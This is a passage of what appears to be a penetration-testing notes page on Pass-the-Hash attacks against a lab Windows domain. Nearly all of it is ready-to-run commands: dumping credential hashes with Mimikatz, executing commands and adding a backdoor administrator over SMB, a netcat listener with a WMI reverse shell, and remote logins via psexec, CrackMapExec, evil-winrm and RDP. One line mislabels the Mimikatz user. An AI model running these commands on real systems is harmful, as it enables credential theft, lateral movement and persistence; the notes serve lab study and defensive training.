Pass the Hash (PtH) Attack

Performing Pass the Hash Attacks

1. Mimikatz (Windows)

Mimikatz Pass the Hash Command:

mimikatz.exe privilege::debug sekurlsa::pth /user:david /domain:inlanefreight.htb /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /run:cmd.exe exit

Launches cmd.exe as julio.
Commands executed in Julio’s context.

Mimikatz Extract Hashes Command

dumps the hashes from memory

mimikatz.exe privilege::debug sekurlsa::logonpasswords

elevates your token, and dumps the SAM hashes

mimikatz.exe privilege::debug token::elevate lsadump::sam

🔗 Mimikatz GitHub

2. Invoke-TheHash (Windows)

https://github.com/Kevin-Robertson/Invoke-TheHash

Using SMB Execution:

Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

Reverse Shell via WMI:

Start a listener:

.\nc.exe -lvnp 8001

Generate reverse shell payload from Reverse Shell Generator.

Execute using: Invoke-TheHash with WMI

Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "<Base64 PowerShell Payload>"

3. Impacket-psexec (Linux)

PsExec Example:

impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Other useful tools:

impacket-wmiexec
impacket-atexec
impacket-smbexec

🔗 Impacket GitHub

4. CrackMapExec (Linux)

Authentication and Command Execution:

# Passing the Hash
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

# Command Execution
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

💬 Pwn3d! means administrative access was successfully obtained.

🔗 NetExec Wiki (formerly CrackMapExec)

5. evil-winrm (Linux)

Establish PowerShell Remoting Session:

evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

🔗 evil-winrm GitHub

6. Pass the Hash via RDP (Linux)

Requirements:

Restricted Admin Mode must be enabled.

Enable Restricted Admin Mode:

This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Pass the Hash Using RDP

xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

🔗 FreeRDP GitHub

⚠️ UAC Limitations for Local Accounts

UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

LocalAccountTokenFilterPolicy determines if local users (besides built-in admin) can perform remote administration.
FilterAdministratorToken can UAC-protect even the built-in administrator account.

🔗 Pass-the-Hash is Dead: LocalAccountTokenFilterPolicy

PreviousWindows Lateral Movement NextPass the Ticket from Windows

Last updated 9 months ago

hashtagPerforming Pass the Hash Attacks

hashtag1. Mimikatz (Windows)

hashtagMimikatz Pass the Hash Command:

hashtagMimikatz Extract Hashes Command

hashtag2. Invoke-TheHash (Windows)

hashtagUsing SMB Execution:

hashtagReverse Shell via WMI:

hashtag3. Impacket-psexec (Linux)

hashtag4. CrackMapExec (Linux)

hashtag5. evil-winrm (Linux)

hashtag6. Pass the Hash via RDP (Linux)

hashtagRequirements:

hashtag⚠️ UAC Limitations for Local Accounts